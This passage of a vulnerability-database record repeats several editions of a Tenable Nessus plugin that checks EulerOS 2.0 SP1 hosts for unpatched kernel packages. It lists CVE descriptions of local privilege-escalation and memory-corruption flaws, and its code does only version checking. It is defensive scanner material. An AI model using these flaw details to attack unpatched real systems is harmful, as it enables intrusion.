\"python-perf-3.10.0-229.49.1.152\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "title": "EulerOS 2.0 SP1 : kernel (EulerOS-SA-2017-1271)", "type": "nessus", "viewCount": 11}, "differentElements": ["sourceData"], "edition": 23, "lastseen": "2020-03-17T22:27:35"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-debug", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-ori", "p-cpe:/a:huawei:euleros:kernel-debuginfo", "cpe:/o:huawei:euleros:2.0"], "cvelist": ["CVE-2017-12188", "CVE-2017-1000111", "CVE-2017-15274", "CVE-2017-15265", "CVE-2017-14991", "CVE-2017-15649", "CVE-2017-1000112", "CVE-2017-12192"], "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "According to the versions of the kernel packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - arch/x86/kvm/mmu.c in the Linux kernel through 4.13.5, when nested virtualisation is used, does not properly traverse guest pagetable entries to resolve a guest virtual address, which allows L1 guest OS users to execute arbitrary code on the host OS or cause a denial of service (incorrect index during page walking, and host OS crash), aka an MMU potential stack buffer overrun.(CVE-2017-12188)\n\n - A vulnerability was found in the Key Management sub component of the Linux kernel, where when trying to issue a KEYTCL_READ on negative key would lead to a NULL pointer dereference. A local attacker could use this flaw to crash the kernel.(CVE-2017-12192)\n\n - security/keys/keyctl.c in the Linux kernel before 4.11.5 does not consider the case of a NULL payload in conjunction with a nonzero length value, which allows local users to cause a denial of service (NULL pointer dereference and OOPS) via a crafted add_key or keyctl system call, a different vulnerability than CVE-2017-12192.(CVE-2017-15274)\n\n - Linux kernel: heap out-of-bounds in AF_PACKET sockets.\n This new issue is analogous to previously disclosed CVE-2016-8655. In both cases, a socket option that changes socket state may race with safety checks in packet_set_ring. Previously with PACKET_VERSION. This time with PACKET_RESERVE. The solution is similar: lock the socket for the update. This issue may be exploitable, we did not investigate further. As this issue affects PF_PACKET sockets, it requires CAP_NET_RAW in the process namespace. But note that with user namespaces enabled, any process can create a namespace in which it has CAP_NET_RAW.(CVE-2017-1000111)\n\n - Use-after-free vulnerability in the Linux kernel before 4.14-rc5 allows local users to have unspecified impact via vectors related to /dev/snd/seq.(CVE-2017-15265)\n\n - net/packet/af_packet.c in the Linux kernel before 4.13.6 allows local users to gain privileges via crafted system calls that trigger mishandling of packet_fanout data structures, because of a race condition (involving fanout_add and packet_do_bind) that leads to a use-after-free, a different vulnerability than CVE-2017-6346.(CVE-2017-15649)\n\n - The sg_ioctl function in drivers/scsi/sg.c in the Linux kernel before 4.13.4 allows local users to obtain sensitive information from uninitialized kernel heap-memory locations via an SG_GET_REQUEST_TABLE ioctl call for /dev/sg0.(CVE-2017-14991)\n\n - An exploitable memory corruption flaw was found in the Linux kernel. The append path can be erroneously switched from UFO to non-UFO in ip_ufo_append_data() when building an UFO packet with MSG_MORE option. If unprivileged user namespaces are available, this flaw can be exploited to gain root privileges.(CVE-2017-1000112)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 6, "enchantments": {}, "hash": "ca146dc4f535a18a3dc22d32dbdff6495f14892aa8a51dc7926dedbe1d61e206", "hashmap": [{"hash": "5d448df9b5b03d5d1af99dcec80426e9", "key": "description"}, {"hash": "cfd16da9581e0c21db590e40dfd9e493", "key": "cvss"}, {"hash": "7acfb1dad6fa293712e662bc49a6d2f4", "key": "modified"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "66f446fdb7c2006a04bea5463c388f23", "key": "references"}, {"hash": "7f3fc6aad33a1863cefc360385a3b643", "key": "pluginID"}, {"hash": "b2573c147a18eb3538492c3eb18bffba", "key": "title"}, {"hash": "48d9b075d0ea78a1e05d84fd88104d57", "key": "sourceData"}, {"hash": "9085609a2f5279d2a09e7acf95bb1a88", "key": "cvelist"}, {"hash": "b79db8712766d5c42d714bea58fdbe62", "key": "href"}, {"hash": "2c23739456a1260ec0dda9d22fdc03d2", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "8025de7ead78142d575757b1ef68ec3b", "key": "cpe"}, {"hash": "67933a273737791ab6f71e29a2605c31", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=104296", "id": "EULEROS_SA-2017-1271.NASL", "lastseen": "2017-12-13T01:05:39", "modified": "2017-11-16T00:00:00", "naslFamily": "Huawei Local Security Checks", "objectVersion": "1.3", "pluginID": "104296", "published": "2017-11-01T00:00:00", "references": ["http://www.nessus.org/u?bb1444fd"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104296);\n script_version(\"$Revision: 3.5 $\");\n script_cvs_date(\"$Date: 2017/12/12 17:44:33 $\");\n\n script_cve_id(\n \"CVE-2017-1000111\",\n \"CVE-2017-1000112\",\n \"CVE-2017-12188\",\n \"CVE-2017-12192\",\n \"CVE-2017-14991\",\n \"CVE-2017-15265\",\n \"CVE-2017-15274\",\n \"CVE-2017-15649\"\n );\n script_osvdb_id(\n 163121,\n 163122,\n 166647,\n 167115,\n 167127,\n 167222,\n 167244,\n 167826\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : kernel (EulerOS-SA-2017-1271)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - arch/x86/kvm/mmu.c in the Linux kernel through 4.13.5,\n when nested virtualisation is used, does not properly\n traverse guest pagetable entries to resolve a guest\n virtual address, which allows L1 guest OS users to\n execute arbitrary code on the host OS or cause a denial\n of service (incorrect index during page walking, and\n host OS crash), aka an MMU potential stack buffer\n overrun.(CVE-2017-12188)\n\n - A vulnerability was found in the Key Management sub\n component of the Linux kernel, where when trying to\n issue a KEYTCL_READ on negative key would lead to a\n NULL pointer dereference. A local attacker could use\n this flaw to crash the kernel.(CVE-2017-12192)\n\n - security/keys/keyctl.c in the Linux kernel before\n 4.11.5 does not consider the case of a NULL payload in\n conjunction with a nonzero length value, which allows\n local users to cause a denial of service (NULL pointer\n dereference and OOPS) via a crafted add_key or keyctl\n system call, a different vulnerability than\n CVE-2017-12192.(CVE-2017-15274)\n\n - Linux kernel: heap out-of-bounds in AF_PACKET sockets.\n This new issue is analogous to previously disclosed\n CVE-2016-8655. In both cases, a socket option that\n changes socket state may race with safety checks in\n packet_set_ring. Previously with PACKET_VERSION. This\n time with PACKET_RESERVE. The solution is similar: lock\n the socket for the update. This issue may be\n exploitable, we did not investigate further. As this\n issue affects PF_PACKET sockets, it requires\n CAP_NET_RAW in the process namespace. But note that\n with user namespaces enabled, any process can create a\n namespace in which it has\n CAP_NET_RAW.(CVE-2017-1000111)\n\n - Use-after-free vulnerability in the Linux kernel before\n 4.14-rc5 allows local users to have unspecified impact\n via vectors related to /dev/snd/seq.(CVE-2017-15265)\n\n - net/packet/af_packet.c in the Linux kernel before\n 4.13.6 allows local users to gain privileges via\n crafted system calls that trigger mishandling of\n packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind)\n that leads to a use-after-free, a different\n vulnerability than CVE-2017-6346.(CVE-2017-15649)\n\n - The sg_ioctl function in drivers/scsi/sg.c in the Linux\n kernel before 4.13.4 allows local users to obtain\n sensitive information from uninitialized kernel\n heap-memory locations via an SG_GET_REQUEST_TABLE ioctl\n call for /dev/sg0.(CVE-2017-14991)\n\n - An exploitable memory corruption flaw was found in the\n Linux kernel. The append path can be erroneously\n switched from UFO to non-UFO in ip_ufo_append_data()\n when building an UFO packet with MSG_MORE option. If\n unprivileged user namespaces are available, this flaw\n can be exploited to gain root\n privileges.(CVE-2017-1000112)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # http://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1271\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bb1444fd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-229.49.1.152\",\n \"kernel-debug-3.10.0-229.49.1.152\",\n \"kernel-debuginfo-3.10.0-229.49.1.152\",\n \"kernel-debuginfo-common-x86_64-3.10.0-229.49.1.152\",\n \"kernel-devel-3.10.0-229.49.1.152\",\n \"kernel-headers-3.10.0-229.49.1.152\",\n \"kernel-tools-3.10.0-229.49.1.152\",\n \"kernel-tools-libs-3.10.0-229.49.1.152\",\n \"perf-3.10.0-229.49.1.152\",\n \"python-perf-3.10.0-229.49.1.152\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "title": "EulerOS 2.0 SP1 : kernel (EulerOS-SA-2017-1271)", "type": "nessus", "viewCount": 10}, "differentElements": ["modified", "cpe"], "edition": 6, "lastseen": "2017-12-13T01:05:39"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-debug", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-debuginfo", "cpe:/o:huawei:euleros:2.0"], "cvelist": ["CVE-2017-12188", "CVE-2017-1000111", "CVE-2017-15274", "CVE-2017-15265", "CVE-2017-14991", "CVE-2017-15649", "CVE-2017-1000112", "CVE-2017-12192"], "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "According to the versions of the kernel packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - arch/x86/kvm/mmu.c in the Linux kernel through 4.13.5, when nested virtualisation is used, does not properly traverse guest pagetable entries to resolve a guest virtual address, which allows L1 guest OS users to execute arbitrary code on the host OS or cause a denial of service (incorrect index during page walking, and host OS crash), aka an MMU potential stack buffer overrun.(CVE-2017-12188)\n\n - A vulnerability was found in the Key Management sub component of the Linux kernel, where when trying to issue a KEYTCL_READ on negative key would lead to a NULL pointer dereference. A local attacker could use this flaw to crash the kernel.(CVE-2017-12192)\n\n - security/keys/keyctl.c in the Linux kernel before 4.11.5 does not consider the case of a NULL payload in conjunction with a nonzero length value, which allows local users to cause a denial of service (NULL pointer dereference and OOPS) via a crafted add_key or keyctl system call, a different vulnerability than CVE-2017-12192.(CVE-2017-15274)\n\n - Linux kernel: heap out-of-bounds in AF_PACKET sockets.\n This new issue is analogous to previously disclosed CVE-2016-8655. In both cases, a socket option that changes socket state may race with safety checks in packet_set_ring. Previously with PACKET_VERSION. This time with PACKET_RESERVE. The solution is similar: lock the socket for the update. This issue may be exploitable, we did not investigate further. As this issue affects PF_PACKET sockets, it requires CAP_NET_RAW in the process namespace. But note that with user namespaces enabled, any process can create a namespace in which it has CAP_NET_RAW.(CVE-2017-1000111)\n\n - Use-after-free vulnerability in the Linux kernel before 4.14-rc5 allows local users to have unspecified impact via vectors related to /dev/snd/seq.(CVE-2017-15265)\n\n - net/packet/af_packet.c in the Linux kernel before 4.13.6 allows local users to gain privileges via crafted system calls that trigger mishandling of packet_fanout data structures, because of a race condition (involving fanout_add and packet_do_bind) that leads to a use-after-free, a different vulnerability than CVE-2017-6346.(CVE-2017-15649)\n\n - The sg_ioctl function in drivers/scsi/sg.c in the Linux kernel before 4.13.4 allows local users to obtain sensitive information from uninitialized kernel heap-memory locations via an SG_GET_REQUEST_TABLE ioctl call for /dev/sg0.(CVE-2017-14991)\n\n - An exploitable memory corruption flaw was found in the Linux kernel. The append path can be erroneously switched from UFO to non-UFO in ip_ufo_append_data() when building an UFO packet with MSG_MORE option. If unprivileged user namespaces are available, this flaw can be exploited to gain root privileges.(CVE-2017-1000112)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 9, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}}, "hash": "f789de0e40e5f2e02b0432fb2006160833a14d7d95fad075f4b6f53cfba9cc75", "hashmap": [{"hash": "77a934ad743276b761d63310df7ef73c", "key": "cpe"}, {"hash": "e27d139a5b511fc7575e69493e937298", "key": "modified"}, {"hash": "f354a5f31119195123ffcb3a186ebfaf", "key": "sourceData"}, {"hash": "5d448df9b5b03d5d1af99dcec80426e9", "key": "description"}, {"hash": "cfd16da9581e0c21db590e40dfd9e493", "key": "cvss"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "66f446fdb7c2006a04bea5463c388f23", "key": "references"}, {"hash": "7f3fc6aad33a1863cefc360385a3b643", "key": "pluginID"}, {"hash": "b2573c147a18eb3538492c3eb18bffba", "key": "title"}, {"hash": "9085609a2f5279d2a09e7acf95bb1a88", "key": "cvelist"}, {"hash": "b79db8712766d5c42d714bea58fdbe62", "key": "href"}, {"hash": "2c23739456a1260ec0dda9d22fdc03d2", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "67933a273737791ab6f71e29a2605c31", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=104296", "id": "EULEROS_SA-2017-1271.NASL", "lastseen": "2018-06-12T17:38:41", "modified": "2018-06-11T00:00:00", "naslFamily": "Huawei Local Security Checks", "objectVersion": "1.3", "pluginID": "104296", "published": "2017-11-01T00:00:00", "references": ["http://www.nessus.org/u?bb1444fd"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104296);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2018/06/11 20:44:35\");\n\n script_cve_id(\n \"CVE-2017-1000111\",\n \"CVE-2017-1000112\",\n \"CVE-2017-12188\",\n \"CVE-2017-12192\",\n \"CVE-2017-14991\",\n \"CVE-2017-15265\",\n \"CVE-2017-15274\",\n \"CVE-2017-15649\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : kernel (EulerOS-SA-2017-1271)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - arch/x86/kvm/mmu.c in the Linux kernel through 4.13.5,\n when nested virtualisation is used, does not properly\n traverse guest pagetable entries to resolve a guest\n virtual address, which allows L1 guest OS users to\n execute arbitrary code on the host OS or cause a denial\n of service (incorrect index during page walking, and\n host OS crash), aka an MMU potential stack buffer\n overrun.(CVE-2017-12188)\n\n - A vulnerability was found in the Key Management sub\n component of the Linux kernel, where when trying to\n issue a KEYTCL_READ on negative key would lead to a\n NULL pointer dereference. A local attacker could use\n this flaw to crash the kernel.(CVE-2017-12192)\n\n - security/keys/keyctl.c in the Linux kernel before\n 4.11.5 does not consider the case of a NULL payload in\n conjunction with a nonzero length value, which allows\n local users to cause a denial of service (NULL pointer\n dereference and OOPS) via a crafted add_key or keyctl\n system call, a different vulnerability than\n CVE-2017-12192.(CVE-2017-15274)\n\n - Linux kernel: heap out-of-bounds in AF_PACKET sockets.\n This new issue is analogous to previously disclosed\n CVE-2016-8655. In both cases, a socket option that\n changes socket state may race with safety checks in\n packet_set_ring. Previously with PACKET_VERSION. This\n time with PACKET_RESERVE. The solution is similar: lock\n the socket for the update. This issue may be\n exploitable, we did not investigate further. As this\n issue affects PF_PACKET sockets, it requires\n CAP_NET_RAW in the process namespace. But note that\n with user namespaces enabled, any process can create a\n namespace in which it has\n CAP_NET_RAW.(CVE-2017-1000111)\n\n - Use-after-free vulnerability in the Linux kernel before\n 4.14-rc5 allows local users to have unspecified impact\n via vectors related to /dev/snd/seq.(CVE-2017-15265)\n\n - net/packet/af_packet.c in the Linux kernel before\n 4.13.6 allows local users to gain privileges via\n crafted system calls that trigger mishandling of\n packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind)\n that leads to a use-after-free, a different\n vulnerability than CVE-2017-6346.(CVE-2017-15649)\n\n - The sg_ioctl function in drivers/scsi/sg.c in the Linux\n kernel before 4.13.4 allows local users to obtain\n sensitive information from uninitialized kernel\n heap-memory locations via an SG_GET_REQUEST_TABLE ioctl\n call for /dev/sg0.(CVE-2017-14991)\n\n - An exploitable memory corruption flaw was found in the\n Linux kernel. The append path can be erroneously\n switched from UFO to non-UFO in ip_ufo_append_data()\n when building an UFO packet with MSG_MORE option. If\n unprivileged user namespaces are available, this flaw\n can be exploited to gain root\n privileges.(CVE-2017-1000112)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # http://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1271\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bb1444fd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-229.49.1.152\",\n \"kernel-debug-3.10.0-229.49.1.152\",\n \"kernel-debuginfo-3.10.0-229.49.1.152\",\n \"kernel-debuginfo-common-x86_64-3.10.0-229.49.1.152\",\n \"kernel-devel-3.10.0-229.49.1.152\",\n \"kernel-headers-3.10.0-229.49.1.152\",\n \"kernel-tools-3.10.0-229.49.1.152\",\n \"kernel-tools-libs-3.10.0-229.49.1.152\",\n \"perf-3.10.0-229.49.1.152\",\n \"python-perf-3.10.0-229.49.1.152\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "title": "EulerOS 2.0 SP1 : kernel (EulerOS-SA-2017-1271)", "type": "nessus", "viewCount": 10}, "differentElements": ["modified", "sourceData"], "edition": 9, "lastseen": "2018-06-12T17:38:41"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-debug", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-ori", "p-cpe:/a:huawei:euleros:kernel-debuginfo", "cpe:/o:huawei:euleros:2.0"], "cvelist": ["CVE-2017-12188", "CVE-2017-1000111", "CVE-2017-15274", "CVE-2017-15265", "CVE-2017-15649", "CVE-2017-12192"], "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "According to the versions of the kernel packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - arch/x86/kvm/mmu.c in the Linux kernel through 4.13.5, when nested virtualisation is used, does not properly traverse guest pagetable entries to resolve a guest virtual address, which allows L1 guest OS users to execute arbitrary code on the host OS or cause a denial of service (incorrect index during page walking, and host OS crash), aka an MMU potential stack buffer overrun.(CVE-2017-12188)\n\n - A vulnerability was found in the Key Management sub component of the Linux kernel, where when trying to issue a KEYTCL_READ on negative key would lead to a NULL pointer dereference. A local attacker could use this flaw to crash the kernel.(CVE-2017-12192)\n\n - security/keys/keyctl.c in the Linux kernel before 4.11.5 does not consider the case of a NULL payload in conjunction with a nonzero length value, which allows local users to cause a denial of service (NULL pointer dereference and OOPS) via a crafted add_key or keyctl system call, a different vulnerability than CVE-2017-12192.(CVE-2017-15274)\n\n - Linux kernel: heap out-of-bounds in AF_PACKET sockets.\n This new issue is analogous to previously disclosed CVE-2016-8655. In both cases, a socket option that changes socket state may race with safety checks in packet_set_ring. Previously with PACKET_VERSION. This time with PACKET_RESERVE. The solution is similar: lock the socket for the update. This issue may be exploitable, we did not investigate further. As this issue affects PF_PACKET sockets, it requires CAP_NET_RAW in the process namespace. But note that with user namespaces enabled, any process can create a namespace in which it has CAP_NET_RAW.(CVE-2017-1000111)\n\n - Use-after-free vulnerability in the Linux kernel before 4.14-rc5 allows local users to have unspecified impact via vectors related to /dev/snd/seq.(CVE-2017-15265)\n\n - net/packet/af_packet.c in the Linux kernel before 4.13.6 allows local users to gain privileges via crafted system calls that trigger mishandling of packet_fanout data structures, because of a race condition (involving fanout_add and packet_do_bind) that leads to a use-after-free, a different vulnerability than CVE-2017-6346.(CVE-2017-15649)\n\nNote that Tenable Network Security has extracted the preceding description block directly from 